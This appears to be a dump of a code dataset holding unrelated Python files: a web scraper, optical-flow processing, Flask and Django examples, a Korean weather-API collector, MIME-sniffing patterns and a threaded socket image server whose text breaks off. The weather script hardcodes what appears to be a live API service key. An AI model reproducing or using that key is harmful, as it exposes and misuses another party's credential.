text stringlengths 38 1.54M |
|---|
from import_modules import *
from jild_hadith_parsing import *
book_jild_json = {}
all_jild_links = get_all_jild_links(book_url)
for jild_link in all_jild_links[:]:
book_jild_jsons = []
book_jild_json = {}
print(jild_link)
jild_response = protect_get_connection_error(url=jild_link)
jild_soup = BeautifulSoup(jild_response.content, 'html5lib')
book_title_text = get_book_title(jild_soup)
book_jild_json['title'] = book_title_text
book_jild_json = initialize_book_jild_json(book_jild_json)
file_name = book_title_text.split('/')[-1]
main_div = jild_soup.find('div', class_='AllHadith').find_all('div')
hadith_divs = get_all_hadith_divs(jild_soup)
chapter_json = {}
print(len(main_div))
count = 0
for cr_div in main_div:
count += 1
div_class = ' '.join(cr_div['class'])
if div_class == 'chapter':
print(f'{count}-----------------{div_class}')
if chapter_json:
print(f'if -----------{chapter_json.keys()}')
book_jild_json['children'].append(chapter_json)
chapter_json = {}
chapter_json["string"] = get_chapter_name(cr_div)
chapter_json["heading"] = 3
chapter_json["children"] = []
elif div_class == "actualHadithContainer hadith_container_riyadussalihin":
print(f'{count}-----------------{div_class}')
hadith_json = get_hadith_json(cr_div)
chapter_json["children"].append(hadith_json)
book_jild_json['children'].append(chapter_json)
book_jild_jsons.append(book_jild_json)
print(f'{len(book_jild_jsons)}')
print(f'{file_name}')
with open(f'All_Books/{file_name}.json', 'a') as outfile:
json.dump(book_jild_jsons, outfile)
|
import os
import numpy as np
import pathlib
from imageio import imread
import cv2
indir = 'data/gray/'
outdir = 'data/flow/'
hsvdir = 'data/flowhsv/'
warpdir = 'data/warped/'
def draw_hsv(flow):
h, w = flow.shape[:2]
fx, fy = flow[:,:,0], flow[:,:,1]
ang = np.arctan2(fy, fx) + np.pi
v = np.sqrt(fx*fx+fy*fy)
hsv = np.zeros((h, w, 3), np.uint8)
hsv[...,0] = ang*(180/np.pi/2)
hsv[...,1] = 255
hsv[...,2] = cv2.normalize(v, None, 0, 255, cv2.NORM_MINMAX)
bgr = cv2.cvtColor(hsv, cv2.COLOR_HSV2BGR)
return bgr
def warp_flow(img, flow):
h, w = flow.shape[:2]
flow = -flow
flow[:,:,0] += np.arange(w)
flow[:,:,1] += np.arange(h)[:,np.newaxis]
res = cv2.remap(img, flow, None, cv2.INTER_LINEAR)
return res
for rundir in sorted(os.listdir(indir)):
infulldir = indir+rundir
outfulldir = outdir+rundir
hsvfulldir = hsvdir+rundir
warpfulldir = warpdir+rundir
infnames = [infulldir+"/"+fname for fname in sorted(os.listdir(infulldir))]
outfnames = [outfulldir+"/"+fname[:-4]+".npy" for fname in sorted(os.listdir(infulldir))]
hsvfnames = [hsvfulldir+"/"+fname for fname in sorted(os.listdir(infulldir))]
warpfnames = [warpfulldir+"/"+fname for fname in sorted(os.listdir(infulldir))]
# create output directory
pathlib.Path(outfulldir).mkdir(parents=True, exist_ok=True)
pathlib.Path(hsvfulldir).mkdir(parents=True, exist_ok=True)
pathlib.Path(warpfulldir).mkdir(parents=True, exist_ok=True)
for t in range(len(infnames)-1):
im1 = np.asarray(imread(infnames[t]))
im2 = np.asarray(imread(infnames[t+1]))
flow = cv2.calcOpticalFlowFarneback(im1, im2, None, 0.5, 3, 15, 3, 5, 1.2, 0)
# save flow to numpy file
np.save(outfnames[t], flow)
# draw flow in HSV (magnitude and angle)
flowhsv = draw_hsv(flow)
cv2.imwrite(hsvfnames[t], flowhsv)
im2w = warp_flow(im1, flow)
# im2w = 255.*(im2w > 128) # make sure the image is binary
cv2.imwrite(warpfnames[t], im2w)
# print min/max flow for normalization during training
IMIN = np.inf
IMAX = -np.inf
for rundir in sorted(os.listdir(outdir)):
d = outdir+rundir
for fname in sorted(os.listdir(d)):
ffname = d+"/"+fname
img = np.load(ffname)
imin, imax = img.min(), img.max()
if imin < IMIN:
IMIN = imin
if imax > IMAX:
IMAX = imax
print(IMIN, IMAX)
|
from javax.swing import *
def hello(event):
print "Hello. I'm an event."
def test():
frame = JFrame("Hello Jython")
button = JButton("Hello",font=("Currier", 100, 60), actionPerformed=hello)
frame.add(button)
frame.setDefaultCloseOperation(JFrame.EXIT_ON_CLOSE)
frame.setSize(300, 300)
frame.show()
test()
|
#!/usr/bin/python
#-*- coding: utf-8 -*-
import urllib2
import json
import pprint
from cStringIO import StringIO
import datetime, time
import mysql.connector
from mysql.connector.errors import Error
from mysql.connector import errorcode
with open('/home/admin/collect/db_config.json', 'r') as f:
DB_CONFIG = json.loads( f.read() )
LOCATION_INFOS = {
'경상북도 포항시 남구 구룡포읍':{'do':'경상북도','gu':'포항시남구','dong':'구룡포읍', 'x':'105', 'y':'94' ,'AreaNo':'4711125000'},
'경상북도 포항시 남구 연일읍':{'do':'경상북도','gu':'포항시남구','dong':'연일읍', 'x':'102', 'y':'94' ,'AreaNo':'4711125300'},
'경상북도 포항시 남구 오천읍':{'do':'경상북도','gu':'포항시남구','dong':'오천읍', 'x':'103', 'y':'93' ,'AreaNo':'4711125600'},
'경상북도 포항시 남구 대송면':{'do':'경상북도','gu':'포항시남구','dong':'대송면', 'x':'102', 'y':'93' ,'AreaNo':'4711131000'},
'경상북도 포항시 남구 동해면':{'do':'경상북도','gu':'포항시남구','dong':'동해면', 'x':'104', 'y':'94' ,'AreaNo':'4711132000'},
'경상북도 포항시 남구 장기면':{'do':'경상북도','gu':'포항시남구','dong':'장기면', 'x':'105', 'y':'92' ,'AreaNo':'4711133000'},
'경상북도 포항시 남구 호미곶면':{'do':'경상북도','gu':'포항시남구','dong':'호미곶면', 'x':'106', 'y':'96' ,'AreaNo':'4711135000'},
'경상북도 포항시 남구 상대동':{'do':'경상북도','gu':'포항시남구','dong':'상대동', 'x':'102', 'y':'94' ,'AreaNo':'4711152500'},
'경상북도 포항시 남구 해도동':{'do':'경상북도','gu':'포항시남구','dong':'해도동', 'x':'102', 'y':'94' ,'AreaNo':'4711154500'},
'경상북도 포항시 남구 송도동':{'do':'경상북도','gu':'포항시남구','dong':'송도동', 'x':'102', 'y':'94' ,'AreaNo':'4711155000'},
'경상북도 포항시 남구 청림동':{'do':'경상북도','gu':'포항시남구','dong':'청림동', 'x':'103', 'y':'94' ,'AreaNo':'4711156000'},
'경상북도 포항시 남구 제철동':{'do':'경상북도','gu':'포항시남구','dong':'제철동', 'x':'103', 'y':'94' ,'AreaNo':'4711157000'},
'경상북도 포항시 남구 효곡동':{'do':'경상북도','gu':'포항시남구','dong':'효곡동', 'x':'102', 'y':'94' ,'AreaNo':'4711158000'},
'경상북도 포항시 남구 대이동':{'do':'경상북도','gu':'포항시남구','dong':'대이동', 'x':'102', 'y':'94' ,'AreaNo':'4711159000'},
'경상북도 포항시 북구 흥해읍':{'do':'경상북도','gu':'포항시북구','dong':'흥해읍', 'x':'102', 'y':'96' ,'AreaNo':'4711325000'},
'경상북도 포항시 북구 신광면':{'do':'경상북도','gu':'포항시북구','dong':'신광면', 'x':'100', 'y':'97' ,'AreaNo':'4711331000'},
'경상북도 포항시 북구 청하면':{'do':'경상북도','gu':'포항시북구','dong':'청하면', 'x':'102', 'y':'98' ,'AreaNo':'4711332000'},
'경상북도 포항시 북구 송라면':{'do':'경상북도','gu':'포항시북구','dong':'송라면', 'x':'102', 'y':'99' ,'AreaNo':'4711333000'},
'경상북도 포항시 북구 기계면':{'do':'경상북도','gu':'포항시북구','dong':'기계면', 'x':'100', 'y':'95' ,'AreaNo':'4711334000'},
'경상북도 포항시 북구 죽장면':{'do':'경상북도','gu':'포항시북구','dong':'죽장면', 'x':'97', 'y':'97' ,'AreaNo':'4711335000'},
'경상북도 포항시 북구 기북면':{'do':'경상북도','gu':'포항시북구','dong':'기북면', 'x':'99', 'y':'96' ,'AreaNo':'4711336000'},
'경상북도 포항시 북구 중앙동':{'do':'경상북도','gu':'포항시북구','dong':'중앙동', 'x':'102', 'y':'95' ,'AreaNo':'4711352000'},
'경상북도 포항시 북구 양학동':{'do':'경상북도','gu':'포항시북구','dong':'양학동', 'x':'102', 'y':'94' ,'AreaNo':'4711363000'},
'경상북도 포항시 북구 죽도동':{'do':'경상북도','gu':'포항시북구','dong':'죽도동', 'x':'102', 'y':'95' ,'AreaNo':'4711365500'},
'경상북도 포항시 북구 용흥동':{'do':'경상북도','gu':'포항시북구','dong':'용흥동', 'x':'102', 'y':'95' ,'AreaNo':'4711366500'},
'경상북도 포항시 북구 우창동':{'do':'경상북도','gu':'포항시북구','dong':'우창동', 'x':'102', 'y':'95' ,'AreaNo':'4711368000'},
'경상북도 포항시 북구 두호동':{'do':'경상북도','gu':'포항시북구','dong':'두호동', 'x':'102', 'y':'95' ,'AreaNo':'4711369000'},
'경상북도 포항시 북구 장량동':{'do':'경상북도','gu':'포항시북구','dong':'장량동', 'x':'102', 'y':'95' ,'AreaNo':'4711370000'},
'경상북도 포항시 북구 환여동':{'do':'경상북도','gu':'포항시북구','dong':'환여동', 'x':'103', 'y':'95' ,'AreaNo':'4711371000'},
}
DATA_GO_URL = 'http://newsky2.kma.go.kr'
SEVICE_LIST = {
'생활기상지수조회서비스' : "iros/RetrieveLifeIndexService2",
'동네예보정보조회서비스' : "service/SecndSrtpdFrcstInfoService2"
}
DETAIL_FUNCTION = {
'초단기실황조회' : 'ForecastGrib',
'초단기예보조회' : 'ForecastTimeData',
'동네예보조회' : 'ForecastSpaceData',
'예보버전조회' : 'ForecastVersionCheck',
'식중독지수' : 'getFsnLifeList',
'체감온도' : 'getSensorytemLifeList',
'열지수' : 'getHeatLifeList',
'불쾌지수' : 'getDsplsLifeList',
'동파가능지수' : 'getWinterLifeList',
'자외선지수' : 'getUltrvLifeList',
'대기오염확산지수' : 'getAirpollutionLifeList'
}
CODE_INFO = {
'초단기실황' : [ 'T1H', 'RN1', 'SKY', 'UUU', 'VVV', 'REH', 'PTY', 'LGT', 'VEC', 'WSD'],
'식중독지수':'A01_2' ,
'자외선지수':'A07' ,
'체감온도':'A03' ,
'열지수':'A05' ,
'불쾌지수':'A06' ,
'동파가능지수':'A08' ,
'대기오염확산지수':'A09' ,
}
SERVICE_KEY = "2GiBhujMz%2BTjpU7DGW5S08PybBafZ3d1ROrBwFCMcfQ2FszNe0QUpSN3LVA%2F%2FpNAkSXInsyr68yj%2FIte8pP%2FWQ%3D%3D"
SEPARATOR = ','
INPUT_DATETIME_FORMAT = '%Y%m%d%H%M%S'
def insertWeather(cnx, insertQuery, updateQuery, checkQuery, keyList, dataList) :
cursor = cnx.cursor()
cursor.execute(checkQuery, keyList)
for cnt in cursor:
if cnt[0] > 0 :
dataVal = dataList + keyList
#print "updateQuery : %s : %s" %(updateQuery, str( dataVal ) )
cursor.execute(updateQuery, dataVal )
else :
dataVal = keyList + dataList
#print "insertQuery : %s : %s" %(insertQuery, str( dataVal ) )
cursor.execute(insertQuery, dataVal )
cnx.commit()
cursor.close()
def datetimeAddHour( current, h ) :
hour_later = current + datetime.timedelta(hours=h)
retVal = hour_later.strftime(INPUT_DATETIME_FORMAT)
return retVal
def getDateFormat( base_date ) :
myDatetime = datetime.datetime.strptime(base_date, '%Y%m%d')
return myDatetime.strftime('%Y-%m-%d')
def getTimeFormat( base_time ) :
myDatetime = datetime.datetime.strptime(base_time, '%H%M')
return myDatetime.strftime('%H:%M:%S.%f')
def getNowFormat( dateformat='%Y-%m-%d %H:%M:%S', prevHour=0 ) :
today = datetime.datetime.now()
if prevHour != 0 :
today = today - datetime.timedelta(hours=prevHour)
return today.strftime( dateformat )
def print_dic( dic ) :
for keys,values in dic.items():
print( "%s : %s" %( keys, values ) )
|
import heapq
from collections import defaultdict
def dijkstra(graph, start):
distances = {node: float('inf') for node in graph}
distances[start] = 0
queue = []
heapq.heappush(queue, [distances[start], start])
while queue:
current_distance, current_node = heapq.heappop(queue)
if distances[current_node] < current_distance:
continue
for adjacent, weight in graph[current_node].items():
distance = current_distance + weight
if distance < distances[adjacent]:
distances[adjacent] = distance
heapq.heappush(queue, [distance, adjacent])
return distances
def solution(n, s, a, b, fares):
graph = defaultdict(dict)
for fare in fares:
graph[fare[0]][fare[1]] = fare[2]
graph[fare[1]][fare[0]] = fare[2]
start_distances = dijkstra(graph,s)
min_distances = start_distances[a] + start_distances[b]
for i in range(n):
middle_distances = dijkstra(graph,i+1)
distance = start_distances.get(i+1,float('inf')) + middle_distances[a] + middle_distances[b]
min_distances = min(min_distances,distance)
answer = min_distances
return answer |
from flask import Flask
from flask import render_template, request
app = Flask(__name__)
@app.before_request
def antes_request():
print (" Mensaje Antes de Responder la Petición")
@app.after_request
def despues_reques(response):
print (" Mensaje despues de Resolver la Solicitud en el Servidor")
return response
@app.route('/')
def index():
titulo = 'Python-Web'
name = 'Dieguito'
curso= 'De Codigo Facilito Python-Web'
is_premium = False
listado_cursos = ('Python' , 'Perl' , 'Java' , 'Django')
return render_template('index.html', username=name,
title=titulo,
name_curso=curso,
is_premium=is_premium,
list_cursos=listado_cursos)
# Ejemplo URLs dynamicas
@app.route('/usuario/<Apellido>/<Nombre>/<int:edad>')
def usuario(Apellido, Nombre, edad):
return 'Hola ' + Nombre + ' ' + Apellido + ' de: ' + str(edad) + ' Año'
# Funcion
def suma(val1, val2):
return val1 + val2
# Intancia + Funcion
@app.route('/suma')
def suma_template():
titulo = 'Python-Web-Suma'
name = 'Dieguito'
return render_template('suma.html', val1=10,
val2=30,
funcion=suma,
title=titulo,
username=name)
# Intancia Ruta
@app.route('/datos')
def Datos():
nombre = request.args.get('nombre' , '') # Dicc + un dafault
name_curso = request.args.get('curso' , '')
return 'Listado Pasado : ' + nombre + ' ' + name_curso
# Intancia About + funcion
@app.route('/about')
def about():
print (" Mensaje desde la función ABOUT")
return render_template('about.html')
if __name__ == '__main__':
app.run(debug=True, port=9000)
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import blib
from blib import getparam, rmparam, msg, errmsg, errandmsg, site
import pywikibot, re, sys, argparse
import rulib
def process_page(index, page, contents, verbose, comment):
pagetitle = str(page.title())
def pagemsg(txt):
msg("Page %s %s: %s" % (index, pagetitle, txt))
def errandpagemsg(txt):
errandmsg("Page %s %s: %s" % (index, pagetitle, txt))
if verbose:
pagemsg("For [[%s]]:" % pagename)
pagemsg("------- begin text --------")
msg(contents.rstrip("\n"))
msg("------- end text --------")
if not contents.endswith("\n"):
contents += "\n"
tables = re.split(r"^--+\n", contents, 0, re.M)
def table_to_template(table_index):
outlines = []
outlines.append("{{ru-derived verbs")
table_lines = tables[table_index].rstrip("\n").split("\n")
for table_line in table_lines:
if not table_line.startswith("#"):
outlines.append("|" + table_line)
outlines.append("}}")
return outlines
def do_process():
if not page.exists():
pagemsg("WARNING: Page doesn't exist")
return
else:
text = page.text
retval = blib.find_modifiable_lang_section(text, "Russian", pagemsg, force_final_nls=True)
if retval is None:
return
sections, j, secbody, sectail, has_non_lang = retval
outlines = []
curtab_index = 0
lines = secbody.split("\n")
saw_top = False
saw_impf = False
saw_pf = False
in_table = False
header = None
for line in lines:
m = re.search("^==+(.*?)==+$", line)
if m:
header = m.group(1)
outlines.append(line)
continue
if line in ["{{top2}}", "{{der-top}}"] and header == "Derived terms":
if saw_top:
pagemsg("WARNING: Saw {{top2}}/{{der-top}} line twice")
return
saw_top = True
continue
if line in ["''imperfective''", "''perfective''"]:
if header == "Conjugation":
outlines.append(line)
continue
if header != "Derived terms":
pagemsg("WARNING: Apparent derived-terms table in header '%s' rather than 'Derived terms'" % header)
return
if not saw_top:
pagemsg("WARNING: Saw imperfective/perfective line without {{top2}}/{{der-top}} line")
return
if line == "''imperfective''":
if saw_impf:
pagemsg("WARNING: Saw imperfective table portion twice")
return
saw_impf = True
else:
if saw_pf:
pagemsg("WARNING: Saw perfective table portion twice")
return
saw_pf = True
in_table = True
continue
elif line in ["{{bottom2}}", "{{bottom}}", "{{der-bottom}}"]:
if in_table:
if not saw_top or not saw_impf or not saw_pf:
pagemsg("WARNING: Didn't see top, imperfective header or perfective header; saw_top=%s, saw_impf=%s, saw_pf=%s"
% (saw_top, saw_impf, saw_pf))
return
if curtab_index >= len(tables):
pagemsg("WARNING: Too many existing manually-formatted tables, saw %s existing table(s) but only %s replacement(s)"
% (curtab_index + 1, len(tables)))
return
outlines.extend(table_to_template(curtab_index))
curtab_index += 1
saw_top = False
saw_impf = False
saw_pf = False
in_table = False
elif in_table:
continue
else:
outlines.append(line)
if curtab_index != len(tables):
pagemsg("WARNING: Wrong number of existing manually-formatted tables, saw %s existing table(s) but %s replacement(s)"
% (curtab_index, len(tables)))
return
secbody = "\n".join(outlines)
sections[j] = secbody.rstrip("\n") + sectail
return "".join(sections), comment
retval = do_process()
if retval is None:
for table_index in range(len(tables)):
msg("------------------ Table #%s -----------------------" % (table_index + 1))
if len(tables) > 1:
msg("=====Derived terms=====")
else:
msg("====Derived terms====")
outlines = table_to_template(table_index)
msg("\n".join(outlines))
return retval
if __name__ == "__main__":
parser = blib.create_argparser("Push new Russian derived-verb tables from infer_ru_derverb_prefixes.py",
suppress_start_end=True)
parser.add_argument('files', nargs='*', help="Files containing directives.")
parser.add_argument("--direcfile", help="File containing entries.")
parser.add_argument("--comment", help="Comment to use.", required=True)
parser.add_argument("--pagefile", help="File to restrict list of pages done.")
args = parser.parse_args()
if args.pagefile:
pages = set(blib.yield_items_from_file(args.pagefile))
else:
pages = set()
if args.direcfile:
lines = open(args.direcfile, "r", encoding="utf-8")
index_pagename_text_comment = blib.yield_text_from_find_regex(lines, args.verbose)
for _, (index, pagename, text, comment) in blib.iter_items(index_pagename_text_comment,
get_name=lambda x:x[1], get_index=lambda x:x[0]):
if pages and pagename not in pages:
continue
if comment:
comment = "%s; %s" % (comment, args.comment)
else:
comment = args.comment
def do_process_page(page, index, parsed):
return process_page(index, page, text, args.verbose, comment)
blib.do_edit(pywikibot.Page(site, pagename), index, do_process_page,
save=args.save, verbose=args.verbose, diff=args.diff)
else:
for index, extfn in enumerate(args.files):
lines = list(blib.yield_items_from_file(extfn))
pagename = re.sub(r"\.der$", "", rulib.recompose(extfn))
def do_process_page(page, index, parsed):
return process_page(index, page, "\n".join(lines), args.verbose, args.comment)
blib.do_edit(pywikibot.Page(site, pagename), index + 1, do_process_page,
save=args.save, verbose=args.verbose, diff=args.diff)
|
from django.db import models
from django.contrib.auth.models import User
# Create your models here.
class UserProfileInfo(models.Model):
user=models.OneToOneField(User,on_delete=models.CASCADE)
first_name=models.CharField(max_length=256,blank=False,default="First Name")
last_name=models.CharField(blank=True,max_length=256,default="Last Name")
email=models.EmailField(blank=True,unique=True,null=True,max_length=256)
#additional
place=models.CharField(blank=False,max_length=256)
#profile_pic=models.ImageField(upload_to='profile_pic',blank=True)
def __str__(self):
return self.user.username
class Product(models.Model):
product_id=models.AutoField
product_name=models.CharField(max_length=50,default="")
product_price=models.CharField(max_length=20,default="0")
product_pic=models.ImageField(upload_to='images/',blank=True)
def __str__(self):
return self.product_name
class Order(models.Model):
items_json=models.CharField(max_length=5000,default="")
order_id=models.AutoField(primary_key=True)
name=models.CharField(max_length=100,default="")
email=models.CharField(max_length=100,default="")
address=models.CharField(max_length=100,default="")
city=models.CharField(max_length=100,default="")
state=models.CharField(max_length=100,default="")
zip_code=models.CharField(max_length=56,default="")
phone=models.CharField(max_length=10,default="")
def __str__(self):
return self.name
class OrderUpdate(models.Model):
update_id = models.AutoField(primary_key=True)
order_id = models.IntegerField(default="")
update_desc = models.CharField(max_length=5000)
timestamp = models.DateField(auto_now_add=True)
def __str__(self):
return self.update_desc[0:7] + "..."
|
a = 5
b = 10
c = a
a = b
b = c
a
b
four = "4"
print(four*3)
my_name = "student"
print("Hi, " + my_name)
age = "15"
print("I am " + age + " years old")
score = 4
count = 5
total = score * count
print(total)
|
def passo1(p1):
p1 = f'--{p1}--'
def passo2(p2):
print( f'{p1} e {p2}')
return passo2
# retorno = passo1('Abrir a porta')
# # teste = retorno('Entrar no quarto')
# passo1('Abrir a porta')('Entrar no quarto')
def verifica_usuario_logado(funcao):
def verifica():
print('[Antes vamos verifivar se o usuário está logado]')
retorno = funcao()
print('[FIM]')
return retorno
return verifica
@verifica_usuario_logado
def salvar_postagem():
print('....[executando]')
print('Postagem criada')
@verifica_usuario_logado
def salvar_comentario():
print('....[executando]')
print('Comentário criado')
salvar_comentario()
|
from typing import Optional, Set, Tuple
#: Section 3
#: https://mimesniff.spec.whatwg.org/commit-snapshots/609a3a3c935fbb805b46cf3d90768d695a1dcff2/#terminology # noqa: E501
BINARY_BYTES = tuple(
bytes.fromhex(byte)
for byte in (
"00",
"01",
"02",
"03",
"04",
"05",
"06",
"07",
"08",
"0B",
"0E",
"0F",
"10",
"11",
"12",
"13",
"14",
"15",
"16",
"17",
"18",
"19",
"1A",
"1C",
"1D",
"1E",
"1F",
)
)
WHITESPACE_BYTES = {b"\t", b"\r", bytes.fromhex("0c"), b"\n", b" "}
#: Section 4.6
#: https://mimesniff.spec.whatwg.org/commit-snapshots/609a3a3c935fbb805b46cf3d90768d695a1dcff2/#mime-type-groups # noqa: E501
FONT_TYPES = [
b"application/font-cff",
b"application/font-off",
b"application/font-sfnt",
b"application/font-ttf",
b"application/font-woff",
b"application/vnd.ms-fontobject",
b"application/vnd.ms-opentype",
]
ARCHIVE_TYPES = [
b"application/x-rar-compressed",
b"application/zip",
b"application/x-gzip",
]
JAVASCRIPT_TYPES = [
b"application/ecmascript",
b"application/javascript",
b"application/x-ecmascript",
b"application/x-javascript",
b"text/ecmascript",
b"text/javascript",
b"text/javascript1.0",
b"text/javascript1.1",
b"text/javascript1.2",
b"text/javascript1.3",
b"text/javascript1.4",
b"text/javascript1.5",
b"text/jscript",
b"text/livescript",
b"text/x-ecmascript",
b"text/x-javascript",
]
#: Section 5.1, step 2
#: https://mimesniff.spec.whatwg.org/commit-snapshots/609a3a3c935fbb805b46cf3d90768d695a1dcff2/#interpreting-the-resource-metadata # noqa: E501
_APACHE_TYPES = [
b"text/plain",
b"text/plain; charset=ISO-8859-1",
b"text/plain; charset=iso-8859-1",
b"text/plain; charset=UTF-8",
]
#: Section 6.1, step 1
#: https://mimesniff.spec.whatwg.org/commit-snapshots/609a3a3c935fbb805b46cf3d90768d695a1dcff2/#matching-an-image-type-pattern # noqa: E501
IMAGE_PATTERNS = (
(bytes.fromhex("00000100"), bytes.fromhex("ffffffff"), None, b"image/x-icon"),
(bytes.fromhex("00000200"), bytes.fromhex("ffffffff"), None, b"image/x-icon"),
(b"BM", bytes.fromhex("ffff"), None, b"image/bmp"),
(
b"GIF87a",
bytes.fromhex("ffffffffffff"),
None,
b"image/gif",
),
(
b"GIF89a",
bytes.fromhex("ffffffffffff"),
None,
b"image/gif",
),
(
b"RIFF" + bytes.fromhex("00000000") + b"WEBPVP",
bytes.fromhex("ffffffff00000000ffffffffffff"),
None,
b"image/webp",
),
(
bytes.fromhex("89") + b"PNG\r\n" + bytes.fromhex("1a") + b"\n",
bytes.fromhex("ffffffffffffffff"),
None,
b"image/png",
),
(
bytes.fromhex("ffd8ff"),
bytes.fromhex("ffffff"),
None,
b"image/jpeg",
),
)
#: Section 6.2, step 1
#: https://mimesniff.spec.whatwg.org/commit-snapshots/609a3a3c935fbb805b46cf3d90768d695a1dcff2/#matching-an-audio-or-video-type-pattern # noqa: E501
AUDIO_VIDEO_PATTERNS = (
(
b".snd",
bytes.fromhex("ffffffff"),
None,
b"audio/basic",
),
(
b"FORM" + bytes.fromhex("00000000") + b"AIFF",
bytes.fromhex("ffffffff00000000ffffffff"),
None,
b"audio/aiff",
),
(
b"ID3",
bytes.fromhex("ffffff"),
None,
b"audio/mpeg",
),
(
b"OggS" + bytes.fromhex("00"),
bytes.fromhex("ffffffffff"),
None,
b"application/ogg",
),
(
b"MThd" + bytes.fromhex("00000006"),
bytes.fromhex("ffffffffffffffff"),
None,
b"audio/midi",
),
(
b"RIFF" + bytes.fromhex("00000000") + b"AVI ",
bytes.fromhex("ffffffff00000000ffffffff"),
None,
b"video/avi",
),
(
b"RIFF" + bytes.fromhex("00000000") + b"WAVE",
bytes.fromhex("ffffffff00000000ffffffff"),
None,
b"audio/wave",
),
)
#: Section 6.3, step 1
#: https://mimesniff.spec.whatwg.org/commit-snapshots/609a3a3c935fbb805b46cf3d90768d695a1dcff2/#matching-a-font-type-pattern # noqa: E501
FONT_PATTERNS = (
(
(
bytes.fromhex("00000000000000000000000000000000000000000000000000000000000000000000")
+ b"LP"
),
(
bytes.fromhex(
"00000000000000000000000000000000000000000000000000000000000000000000ffff"
)
),
None,
b"application/vnd.ms-fontobject",
),
(
bytes.fromhex("00010000"),
bytes.fromhex("ffffffff"),
None,
b"font/ttf",
),
(b"OTTO", bytes.fromhex("ffffffff"), None, b"font/otf"),
(
b"ttcf",
bytes.fromhex("ffffffff"),
None,
b"font/collection",
),
(
b"wOFF",
bytes.fromhex("ffffffff"),
None,
b"font/woff",
),
(
b"wOF2",
bytes.fromhex("ffffffff"),
None,
b"font/woff2",
),
)
#: Section 6.4, step 1
#: https://mimesniff.spec.whatwg.org/commit-snapshots/609a3a3c935fbb805b46cf3d90768d695a1dcff2/#matching-an-archive-type-pattern # noqa: E501
ARCHIVE_PATTERNS = (
(bytes.fromhex("1f8b08"), bytes.fromhex("ffffff"), None, b"application/x-gzip"),
(
b"PK" + bytes.fromhex("0304"),
bytes.fromhex("ffffffff"),
None,
b"application/zip",
),
(
b"Rar " + bytes.fromhex("1a0700"),
bytes.fromhex("ffffffffffffff"),
None,
b"application/x-rar-compressed",
),
)
#: Section 7.1, step 1
#: https://mimesniff.spec.whatwg.org/commit-snapshots/609a3a3c935fbb805b46cf3d90768d695a1dcff2/#identifying-a-resource-with-an-unknown-mime-type # noqa: E501
TEXT_PATTERNS = tuple(
(prefix + suffix, bytes.fromhex(mask), WHITESPACE_BYTES, b"text/html")
for prefix, mask, in (
(b"<!DOCTYPE HTML", "ffffdfdfdfdfdfdfdfffdfdfdfdfff"),
(b"<HTML", "ffdfdfdfdfff"),
(b"<HEAD", "ffdfdfdfdfff"),
(b"<SCRIPT", "ffdfdfdfdfdfdfff"),
(b"<IFRAME", "ffdfdfdfdfdfdfff"),
(b"<H1", "ffdfffff"),
(b"<DIV", "ffdfdfdfff"),
(b"<FONT", "ffdfdfdfdfff"),
(b"<TABLE", "ffdfdfdfdfdfff"),
(b"<A", "ffdfff"),
(b"<STYLE", "ffdfdfdfdfdfff"),
(b"<TITLE", "ffdfdfdfdfdfff"),
(b"<B", "ffdfff"),
(b"<BODY", "ffdfdfdfdfff"),
(b"<BR", "ffdfdfff"),
(b"<P", "ffdfff"),
(b"<!--", "ffffffffff"),
)
for suffix in (b" ", bytes.fromhex("3E"))
) + (
(b"<?xml", bytes.fromhex("ffffffffff"), WHITESPACE_BYTES, b"text/xml"),
(b"%PDF-", bytes.fromhex("ffffffffff"), None, b"application/pdf"),
)
#: Section 7.1, step 2
#: https://mimesniff.spec.whatwg.org/commit-snapshots/609a3a3c935fbb805b46cf3d90768d695a1dcff2/#identifying-a-resource-with-an-unknown-mime-type # noqa: E501
EXTRA_PATTERNS: Tuple[Tuple[bytes, bytes, Optional[Set[bytes]], bytes], ...] = (
(
b"%!PS-Adobe-",
bytes.fromhex("ffffffffffffffffffffff"),
None,
b"application/postscript",
),
(bytes.fromhex("feff0000"), bytes.fromhex("ffff0000"), None, b"text/plain"),
(bytes.fromhex("fffe0000"), bytes.fromhex("ffff0000"), None, b"text/plain"),
(bytes.fromhex("efbbbf00"), bytes.fromhex("ffffff00"), None, b"text/plain"),
)
|
"""
author:james.bondu
TO-DO
- Use multi Threading for handling of server sending thing ( A separate method to receive images)
Doing
- Multi Threading to both send and receive data
- There must be some way to simply check if its sending or receiving...May be try a separate thread(or main thread )to do the checking first which will invoke a separate
"""
import socket
from PIL import Image
import os
import sys
from threading import Thread
from SocketServer import ThreadingMixIn
from PIL import ImageFile
ImageFile.LOAD_TRUNCATED_IMAGES = True
"""
A proper implementation of a python script to create a web socket server and applying different image compression algorithms.
"""
class Communication:
"""Establishing the proper connection"""
def __init__(self):
host = "127.0.0.1"
port = 10013
self.server = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
self.server.bind((host,port))
self.server.listen(1)
print "server set-up finished"
def close(self):
self.server.close()
def send(self,data):
print "gonna send data"
self.server.send(data)
class Server (Thread):
def __init__ (self,client):
Thread.__init__(self)
self.client = client
print client
print "New Thread started "+str(Thread)
"""Constructor for Threaded subclass .... So I can use it to check the initial message eveery time"""
def run(self):
self.message = self.client.recv(4)
#print self.message
if self.message == "Recv":
print "send Data"
"""If client gives signal it's receiving data server has to send data"""
self.data_send(self.client)
if self.message == "Send":
print " Data receive"
"""If client is giving signal to receive data then server will send data"""
self.data_receive(self.client)
def data_send(self,client):
self.client = client
self.path = "Compressed.jpg"
print "prepare to send"
print self.path
fp = open(self.path,"rb")
while True:
self.data = fp.readline(1024)
if not self.data:
print "data sent"
fp.close()
self.ack = True
self.client.close()
break
self.client.send(self.data)
def data_receive(self,client):
self.client = client
self.path = "Compressed.jpg"
print self.path
if self.client:
self.ack = False
print "Have you met barney"
self.ack = self.receive_data(self.client,self.path)
if self.ack:
print "have you met Ted?"
client.close()
print "Compression Done Bro!!!"
def receive_data(self,client,file_name):
self.client = client
#self.file_name = file_name
fp = open(file_name,"wb")
while True:
self.data = self.client.recv(1024)
#print self.data
if not self.data:
print "data finished"
fp.close()
self.compress_image(file_name)
client.close()
self.ack = True
return self.ack
fp.write(self.data)
def compress_image(self,path):
#self.path = path
"""Compression of Images are done in this method"""
self.img = Image.open(path)
print self.img.size
print os.path.getsize(path)
self.img.save(path,optimize = True,quality = 20)
print os.path.getsize(path)
"""
def compress_image(path):
img = Image.open(path)
print img.size
print os.path.getsize(path)
img.save(path,optimize = True,quality = 20)
print os.path.getsize(path)
def receive_data(client,file_name):
fp = open(file_name,"wb")
while True:
data = client.recv(512)
#print data
